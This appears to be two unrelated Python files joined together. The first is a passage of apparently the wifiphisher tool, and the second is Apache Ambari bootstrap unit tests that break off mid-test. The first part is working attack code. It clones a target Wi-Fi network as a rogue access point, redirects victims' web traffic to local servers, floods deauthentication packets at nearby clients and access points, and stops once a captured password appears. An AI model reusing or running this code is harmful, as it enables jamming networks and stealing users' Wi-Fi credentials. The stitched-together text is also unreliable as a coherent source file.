with open('/tmp/hostapd.conf', 'w') as dhcpconf:
dhcpconf.write(config % (mon_iface, essid, channel))
Popen(['hostapd', '/tmp/hostapd.conf'], stdout=DN, stderr=DN)
try:
time.sleep(6) # Copied from Pwnstar which said it was necessary?
except KeyboardInterrupt:
cleanup(None, None)
def dhcp_conf(interface):
config = ( # disables dnsmasq reading any other files like /etc/resolv.conf for nameservers
'no-resolv\n'
# Interface to bind to
'interface=%s\n'
# Specify starting_range,end_range,lease_time
'dhcp-range=%s\n'
'address=/#/10.0.0.1'
)
ipprefix = get_internet_ip_prefix()
if ipprefix == '19' or ipprefix == '17' or not ipprefix:
with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
# subnet, range, router, dns
dhcpconf.write(config % (interface, '10.0.0.2,10.0.0.100,12h'))
elif ipprefix == '10':
with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
dhcpconf.write(config % (interface, '172.16.0.2,172.16.0.100,12h'))
return '/tmp/dhcpd.conf'
def dhcp(dhcpconf, mon_iface):
os.system('echo > /var/lib/misc/dnsmasq.leases')
dhcp = Popen(['dnsmasq', '-C', dhcpconf], stdout=PIPE, stderr=DN)
ipprefix = get_internet_ip_prefix()
Popen(['ifconfig', str(mon_iface), 'mtu', '1400'], stdout=DN, stderr=DN)
if ipprefix == '19' or ipprefix == '17' or not ipprefix:
Popen(['ifconfig', str(mon_iface), 'up', '10.0.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
else:
Popen(['ifconfig', str(mon_iface), 'up', '172.16.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
os.system('route add -net 172.16.0.0 netmask 255.255.255.0 gw 172.16.0.1')
def get_strongest_iface(exceptions=[]):
interfaces = get_interfaces()["managed"]
scanned_aps = []
for i in interfaces:
if i in exceptions:
continue
count = 0
proc = Popen(['iwlist', i, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, i))
print '['+G+'+'+W+'] Networks discovered by '+G+i+W+': '+T+str(count)+W
if len(scanned_aps) > 0:
interface = max(scanned_aps)[1]
return interface
return False
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
# Wifi Jammer stuff
def channel_hop2(mon_iface):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > 11:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(monchannel):
with open("/tmp/wifiphisher-jammer.tmp", "a+") as log_file:
log_file.truncate()
with lock:
for ca in clients_APs:
if len(ca) > 3:
log_file.write('['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W + '\n')
else:
log_file.write('['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2])
with lock:
for ap in APs:
log_file.write('['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W + '\n')
#print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel)
# Ignore all the noisy packets like spanning tree
if noise_filter(args.skip, pkt.addr1, pkt.addr2):
return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
# Prevent 5GHz APs from being thrown into the mix
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
def sniff_dot11(mon_iface):
"""
We need this here to run it from a thread.
"""
sniff(iface=mon_iface, store=0, prn=cb)
def get_hostapd():
if not os.path.isfile('/usr/sbin/hostapd'):
install = raw_input('['+T+'*'+W+'] isc-dhcp-server not found in /usr/sbin/hostapd, install now? [y/n] ')
if install == 'y':
os.system('apt-get -y install hostapd')
else:
sys.exit('['+R+'-'+W+'] hostapd not found in /usr/sbin/hostapd')
if __name__ == "__main__":
# Are you root?
if os.geteuid():
sys.exit('[' + R + '-' + W + '] Please run as root')
# Get hostapd if needed
get_hostapd()
# Parse args
args = parse_args()
# Start HTTP server in a background thread
Handler = HTTPRequestHandler
httpd = HTTPServer(("", PORT), Handler)
print '[' + T + '*' + W + '] Starting HTTP server at port ' + str(PORT)
webserver = Thread(target=httpd.serve_forever)
webserver.daemon = True
webserver.start()
# Start HTTPS server in a background thread
Handler = SecureHTTPRequestHandler
httpd = SecureHTTPServer(("", SSL_PORT), Handler)
print '[' + T + '*' + W + '] Starting HTTPS server at port ' + str(SSL_PORT)
secure_webserver = Thread(target=httpd.serve_forever)
secure_webserver.daemon = True
secure_webserver.start()
# Get interfaces
reset_interfaces()
if not args.jamminginterface:
inet_iface = get_internet_interface()
mon_iface = get_iface(mode="monitor", exceptions=[inet_iface])
iface_to_monitor = False
else:
mon_iface = False
iface_to_monitor = args.jamminginterface
if not mon_iface:
if args.jamminginterface:
iface_to_monitor = args.jamminginterface
else:
iface_to_monitor = get_strongest_iface()
if not iface_to_monitor and not inet_iface:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
mon_iface = start_mon_mode(iface_to_monitor)
wj_iface = mon_iface
if not args.apinterface:
ap_iface = get_iface(mode="managed", exceptions=[iface_to_monitor])
else:
ap_iface = args.apinterface
# We got the interfaces correctly at this point. Monitor mon_iface & for the AP ap_iface.
# Set iptable rules and kernel variables.
os.system('iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:%s' % PORT)
os.system('iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 10.0.0.1:%s' % SSL_PORT)
Popen(['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'], stdout=DN, stderr=PIPE)
print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
# Copy AP
time.sleep(3)
hop = Thread(target=channel_hop, args=(mon_iface,))
hop.daemon = True
hop.start()
sniffing(mon_iface, targeting_cb)
channel, essid, ap_mac = copy_AP()
hop_daemon_running = False
# Start AP
dhcpconf = dhcp_conf(ap_iface)
dhcp(dhcpconf, ap_iface)
start_ap(ap_iface, channel, essid, args)
os.system('clear')
print '[' + T + '*' + W + '] ' + T + \
essid + W + ' set up on channel ' + \
T + channel + W + ' via ' + T + mon_iface \
+ W + ' on ' + T + str(ap_iface) + W
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
args = parse_args()
args.accesspoint = ap_mac
args.channel = channel
monitor_on = None
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
monchannel = channel
# Start channel hopping
hop = Thread(target=channel_hop2, args=(wj_iface,))
hop.daemon = True
hop.start()
# Start sniffing
sniff_thread = Thread(target=sniff_dot11, args=(wj_iface,))
sniff_thread.daemon = True
sniff_thread.start()
# Main loop.
try:
while 1:
os.system("clear")
print "Jamming devices: "
if os.path.isfile('/tmp/wifiphisher-jammer.tmp'):
proc = check_output(['cat', '/tmp/wifiphisher-jammer.tmp'])
lines = proc.split('\n')
lines += ["\n"] * (5 - len(lines))
else:
lines = ["\n"] * 5
for l in lines:
print l
print "DHCP Leases: "
if os.path.isfile('/var/lib/misc/dnsmasq.leases'):
proc = check_output(['cat', '/var/lib/misc/dnsmasq.leases'])
lines = proc.split('\n')
lines += ["\n"] * (5 - len(lines))
else:
lines = ["\n"] * 5
for l in lines:
print l
print "HTTP requests: "
if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
proc = check_output(['tail', '-5', '/tmp/wifiphisher-webserver.tmp'])
lines = proc.split('\n')
lines += ["\n"] * (5 - len(lines))
else:
lines = ["\n"] * 5
for l in lines:
print l
# We got a victim. Shutdown everything.
if "password" in l:
time.sleep(2)
shutdown()
time.sleep(0.5)
except KeyboardInterrupt:
shutdown()
| |
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from stacks.utils.RMFTestCase import *
import bootstrap
import time
from ambari_commons import subprocess32
import os
import logging
import tempfile
import pprint
from ambari_commons.os_check import OSCheck
from bootstrap import PBootstrap, Bootstrap, BootstrapDefault, SharedState, HostLog, SCP, SSH
from unittest import TestCase
from ambari_commons.subprocess32 import Popen
from bootstrap import AMBARI_PASSPHRASE_VAR_NAME
from mock.mock import MagicMock, call
from mock.mock import patch
from mock.mock import create_autospec
from only_for_platform import not_for_platform, os_distro_value, PLATFORM_WINDOWS
@not_for_platform(PLATFORM_WINDOWS)
class TestBootstrap:#(TestCase):
def setUp(self):
logging.basicConfig(level=logging.ERROR)
def test_getRemoteName(self):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6", None, "8440", "root")
res = bootstrap_obj = Bootstrap("hostname", shared_state)
utime1 = 1234
utime2 = 12345
bootstrap_obj.getUtime = MagicMock(return_value=utime1)
remote1 = bootstrap_obj.getRemoteName("/tmp/setupAgent.sh")
self.assertEquals(remote1, "/tmp/setupAgent{0}.sh".format(utime1))
bootstrap_obj.getUtime.return_value=utime2
remote1 = bootstrap_obj.getRemoteName("/tmp/setupAgent.sh")
self.assertEquals(remote1, "/tmp/setupAgent{0}.sh".format(utime1))
remote2 = bootstrap_obj.getRemoteName("/tmp/host_pass")
self.assertEquals(remote2, "/tmp/host_pass{0}".format(utime2))
# TODO: Test bootstrap timeout
# TODO: test_return_error_message_for_missing_sudo_package
def test_getAmbariPort(self):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
self.assertEquals(bootstrap_obj.getAmbariPort(),"8440")
shared_state.server_port = None
bootstrap_obj = Bootstrap("hostname", shared_state)
self.assertEquals(bootstrap_obj.getAmbariPort(),"null")
@patch.object(subprocess32, "Popen")
@patch("sys.stderr")
@patch("sys.exit")
@patch.object(PBootstrap, "run")
@patch("os.path.dirname")
@patch("os.path.realpath")
def test_bootstrap_main(self, dirname_mock, realpath_mock, run_mock, exit_mock, stderr_mock, subprocess32_Popen_mock):
bootstrap.main(["bootstrap.py", "hostname,hostname2", "/tmp/bootstrap", "root", "123", "sshkey_file", "setupAgent.py", "ambariServer", \
"centos6", "1.1.1", "8440", "root", "passwordfile"])
self.assertTrue(run_mock.called)
run_mock.reset_mock()
bootstrap.main(["bootstrap.py", "hostname,hostname2", "/tmp/bootstrap", "root", "123", "sshkey_file", "setupAgent.py", "ambariServer", \
"centos6", "1.1.1", "8440", "root", None])
self.assertTrue(run_mock.called)
run_mock.reset_mock()
def side_effect(retcode):
raise Exception(retcode, "sys.exit")
exit_mock.side_effect = side_effect
try:
bootstrap.main(["bootstrap.py","hostname,hostname2", "/tmp/bootstrap"])
self.fail("sys.exit(2)")
except Exception:
# Expected
pass
self.assertTrue(exit_mock.called)
@patch("os.environ")
def test_getRunSetupWithPasswordCommand(self, environ_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
environ_mock.__getitem__.return_value = "TEST_PASSPHRASE"
bootstrap_obj = Bootstrap("hostname", shared_state)
utime = 1234
bootstrap_obj.getUtime = MagicMock(return_value=utime)
ret = bootstrap_obj.getRunSetupWithPasswordCommand("hostname")
expected = "/var/lib/ambari-agent/tmp/ambari-sudo.sh -S python /var/lib/ambari-agent/tmp/setupAgent{0}.py hostname TEST_PASSPHRASE " \
"ambariServer root 8440 < /var/lib/ambari-agent/tmp/host_pass{0}".format(utime)
self.assertEquals(ret, expected)
def test_generateRandomFileName(self):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
self.assertTrue(bootstrap_obj.generateRandomFileName(None) == bootstrap_obj.getUtime())
@patch.object(OSCheck, "is_redhat_family")
@patch.object(OSCheck, "is_suse_family")
def test_getRepoDir(self, is_suse_family, is_redhat_family):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
# Suse
is_redhat_family.return_value = False
is_suse_family.return_value = True
res = bootstrap_obj.getRepoDir()
self.assertEquals(res, "/etc/zypp/repos.d")
# non-Suse
is_suse_family.return_value = False
is_redhat_family.return_value = True
res = bootstrap_obj.getRepoDir()
self.assertEquals(res, "/etc/yum.repos.d")
def test_getSetupScript(self):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
self.assertEquals(bootstrap_obj.shared_state.script_dir, "scriptDir")
def test_run_setup_agent_command_ends_with_project_version(self):
os.environ[AMBARI_PASSPHRASE_VAR_NAME] = ""
version = "1.1.1"
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
version, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
runSetupCommand = bootstrap_obj.getRunSetupCommand("hostname")
self.assertTrue(runSetupCommand.endswith(version + " 8440"))
def test_agent_setup_command_without_project_version(self):
os.environ[AMBARI_PASSPHRASE_VAR_NAME] = ""
version = None
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
version, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
runSetupCommand = bootstrap_obj.getRunSetupCommand("hostname")
self.assertTrue(runSetupCommand.endswith(" 8440"))
# TODO: test_os_check_fail_fails_bootstrap_execution
def test_host_log(self):
tmp_file, tmp_filename = tempfile.mkstemp()
dummy_log = HostLog(tmp_filename)
# First write to log
dummy_log.write("a\nb\nc")
# Read it
with open(tmp_filename) as f:
s = f.read()
etalon = "a\nb\nc\n"
self.assertEquals(s, etalon)
# Next write
dummy_log.write("Yet another string")
# Read it
with open(tmp_filename) as f:
s = f.read()
etalon = "a\nb\nc\nYet another string\n"
self.assertEquals(s, etalon)
# Should not append line end if it already exists
dummy_log.write("line break->\n")
# Read it
with open(tmp_filename) as f:
s = f.read()
etalon = "a\nb\nc\nYet another string\nline break->\n"
self.assertEquals(s, etalon)
# Cleanup
os.unlink(tmp_filename)
@patch.object(subprocess32, "Popen")
def test_SCP(self, popenMock):
params = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
"1.2.1", "8440", "root")
host_log_mock = MagicMock()
log = {'text': ""}
def write_side_effect(text):
log['text'] = log['text'] + text
host_log_mock.write.side_effect = write_side_effect
scp = SCP(params.user, params.sshPort, params.sshkey_file, "dummy-host", "src/file",
"dst/file", params.bootdir, host_log_mock)
log_sample = "log_sample"
error_sample = "error_sample"
# Successful run
process = MagicMock()
popenMock.return_value = process
process.communicate.return_value = (log_sample, error_sample)
process.returncode = 0
retcode = scp.run()
self.assertTrue(popenMock.called)
self.assertTrue(log_sample in log['text'])
self.assertTrue(error_sample in log['text'])
command_str = str(popenMock.call_args[0][0])
self.assertEquals(command_str, "['scp', '-r', '-o', 'ConnectTimeout=60', '-o', "
"'BatchMode=yes', '-o', 'StrictHostKeyChecking=no', '-P', '123', '-i', 'sshkey_file',"
" 'src/file', 'root@dummy-host:dst/file']")
self.assertEqual(retcode["exitstatus"], 0)
log['text'] = ""
#unsuccessfull run
process.returncode = 1
retcode = scp.run()
self.assertTrue(log_sample in log['text'])
self.assertTrue(error_sample in log['text'])
self.assertEqual(retcode["exitstatus"], 1)
@patch.object(subprocess32, "Popen")
def test_SSH(self, popenMock):
params = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
"1.2.1", "8440", "root")
host_log_mock = MagicMock()
log = {'text': ""}
def write_side_effect(text):
log['text'] = log['text'] + text
host_log_mock.write.side_effect = write_side_effect
ssh = SSH(params.user, params.sshPort, params.sshkey_file, "dummy-host", "dummy-command",
params.bootdir, host_log_mock)
log_sample = "log_sample"
error_sample = "error_sample"
# Successful run
process = MagicMock()
popenMock.return_value = process
process.communicate.return_value = (log_sample, error_sample)
process.returncode = 0
retcode = ssh.run()
self.assertTrue(popenMock.called)
self.assertTrue(log_sample in log['text'])
self.assertTrue(error_sample in log['text'])
command_str = str(popenMock.call_args[0][0])
self.assertEquals(command_str, "['ssh', '-o', 'ConnectTimeOut=60', '-o', "
"'StrictHostKeyChecking=no', '-o', 'BatchMode=yes', '-tt', '-i', "
"'sshkey_file', '-p', '123', 'root@dummy-host', 'dummy-command']")
self.assertEqual(retcode["exitstatus"], 0)
log['text'] = ""
#unsuccessfull run
process.returncode = 1
retcode = ssh.run()
self.assertTrue(log_sample in log['text'])
self.assertTrue(error_sample in log['text'])
self.assertEqual(retcode["exitstatus"], 1)
log['text'] = ""
# unsuccessful run with error message
process.returncode = 1
dummy_error_message = "dummy_error_message"
ssh = SSH(params.user, params.sshPort, params.sshkey_file, "dummy-host", "dummy-command",
params.bootdir, host_log_mock, errorMessage= dummy_error_message)
retcode = ssh.run()
self.assertTrue(log_sample in log['text'])
self.assertTrue(error_sample in log['text'])
self.assertTrue(dummy_error_message in log['text'])
self.assertEqual(retcode["exitstatus"], 1)
def test_getOsCheckScript(self):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
ocs = bootstrap_obj.getOsCheckScript()
self.assertEquals(ocs, "scriptDir/os_check_type.py")
@patch.object(BootstrapDefault, "getRemoteName")
def test_getOsCheckScriptRemoteLocation(self, getRemoteName_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
v = "/tmp/os_check_type1374259902.py"
getRemoteName_mock.return_value = v
ocs = bootstrap_obj.getOsCheckScriptRemoteLocation()
self.assertEquals(ocs, v)
@patch.object(BootstrapDefault, "is_suse")
def test_getRepoFile(self, is_suse_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
is_suse_mock.return_value = False
rf = bootstrap_obj.getRepoFile()
self.assertEquals(rf, "/etc/yum.repos.d/ambari.repo")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_createTargetDir(self, write_mock, run_mock,
init_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.createTargetDir()
self.assertEquals(res, expected)
command = str(init_mock.call_args[0][4])
self.assertEqual(command,
"SUDO=$([ \"$EUID\" -eq 0 ] && echo || echo sudo) ; $SUDO mkdir -p /var/lib/ambari-agent/tmp ; "
"$SUDO chown -R root /var/lib/ambari-agent/tmp ; "
"$SUDO chmod 755 /var/lib/ambari-agent ; "
"$SUDO chmod 755 /var/lib/ambari-agent/data ; "
"$SUDO chmod 1777 /var/lib/ambari-agent/tmp")
@patch.object(BootstrapDefault, "getOsCheckScript")
@patch.object(BootstrapDefault, "getOsCheckScriptRemoteLocation")
@patch.object(SCP, "__init__")
@patch.object(SCP, "run")
@patch.object(HostLog, "write")
def test_copyOsCheckScript(self, write_mock, run_mock, init_mock,
getOsCheckScriptRemoteLocation_mock, getOsCheckScript_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
getOsCheckScript_mock.return_value = "OsCheckScript"
getOsCheckScriptRemoteLocation_mock.return_value = "OsCheckScriptRemoteLocation"
expected = 42
init_mock.return_value = None
run_mock.return_value = expected
res = bootstrap_obj.copyOsCheckScript()
self.assertEquals(res, expected)
input_file = str(init_mock.call_args[0][4])
remote_file = str(init_mock.call_args[0][5])
self.assertEqual(input_file, "OsCheckScript")
self.assertEqual(remote_file, "OsCheckScriptRemoteLocation")
@patch.object(BootstrapDefault, "getRemoteName")
@patch.object(BootstrapDefault, "hasPassword")
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
def test_getRepoFile(self, is_redhat_family, is_ubuntu_family, is_suse_family, hasPassword_mock, getRemoteName_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
is_redhat_family.return_value = True
is_ubuntu_family.return_value = False
is_suse_family.return_value = False
bootstrap_obj = Bootstrap("hostname", shared_state)
# Without password
hasPassword_mock.return_value = False
getRemoteName_mock.return_value = "RemoteName"
rf = bootstrap_obj.getMoveRepoFileCommand("target")
self.assertEquals(rf, "/var/lib/ambari-agent/tmp/ambari-sudo.sh mv RemoteName target/ambari.repo")
# With password
hasPassword_mock.return_value = True
getRemoteName_mock.return_value = "RemoteName"
rf = bootstrap_obj.getMoveRepoFileCommand("target")
self.assertEquals(rf, "/var/lib/ambari-agent/tmp/ambari-sudo.sh -S mv RemoteName target/ambari.repo < RemoteName")
@patch("os.path.exists")
@patch.object(OSCheck, "is_suse_family")
@patch.object(OSCheck, "is_ubuntu_family")
@patch.object(OSCheck, "is_redhat_family")
@patch.object(BootstrapDefault, "getMoveRepoFileCommand")
@patch.object(BootstrapDefault, "getRepoDir")
@patch.object(BootstrapDefault, "getRepoFile")
@patch.object(BootstrapDefault, "getRemoteName")
@patch.object(SCP, "__init__")
@patch.object(SCP, "run")
@patch.object(SSH, "__init__")
@patch.object(SSH, "run")
@patch.object(HostLog, "write")
def test_copyNeededFiles(self, write_mock, ssh_run_mock, ssh_init_mock,
scp_run_mock, scp_init_mock,
getRemoteName_mock, getRepoFile_mock, getRepoDir,
getMoveRepoFileCommand, is_redhat_family, is_ubuntu_family, is_suse_family,
os_path_exists_mock):
#
# Ambari repo file exists
#
def os_path_exists_side_effect(*args, **kwargs):
if args[0] == getRepoFile_mock():
return True
else:
return False
os_path_exists_mock.side_effect = os_path_exists_side_effect
os_path_exists_mock.return_value = None
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
is_redhat_family.return_value = True
is_ubuntu_family.return_value = False
is_suse_family.return_value = False
bootstrap_obj = Bootstrap("hostname", shared_state)
getMoveRepoFileCommand.return_value = "MoveRepoFileCommand"
getRepoDir.return_value = "RepoDir"
getRemoteName_mock.return_value = "RemoteName"
getRepoFile_mock.return_value = "RepoFile"
expected1 = {"exitstatus": 42, "log": "log42", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
expected3 = {"exitstatus": 1, "log": "log1", "errormsg": "errorMsg"}
expected4 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
scp_init_mock.return_value = None
ssh_init_mock.return_value = None
# Testing max retcode return
scp_run_mock.side_effect = [expected1, expected3]
ssh_run_mock.side_effect = [expected2, expected4]
res = bootstrap_obj.copyNeededFiles()
self.assertEquals(res, expected1["exitstatus"])
input_file = str(scp_init_mock.call_args[0][4])
remote_file = str(scp_init_mock.call_args[0][5])
self.assertEqual(input_file, "setupAgentFile")
self.assertEqual(remote_file, "RemoteName")
command = str(ssh_init_mock.call_args[0][4])
self.assertEqual(command, "/var/lib/ambari-agent/tmp/ambari-sudo.sh chmod 644 RepoFile")
# Another order
expected1 = {"exitstatus": 0, "log": "log0", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
expected3 = {"exitstatus": 1, "log": "log1", "errormsg": "errorMsg"}
expected4 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
scp_run_mock.side_effect = [expected1, expected3]
ssh_run_mock.side_effect = [expected2, expected4]
res = bootstrap_obj.copyNeededFiles()
self.assertEquals(res, expected2["exitstatus"])
# yet another order
expected1 = {"exitstatus": 33, "log": "log33", "errormsg": "errorMsg"}
expected2 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
expected3 = {"exitstatus": 42, "log": "log42", "errormsg": "errorMsg"}
expected4 = {"exitstatus": 17, "log": "log17", "errormsg": "errorMsg"}
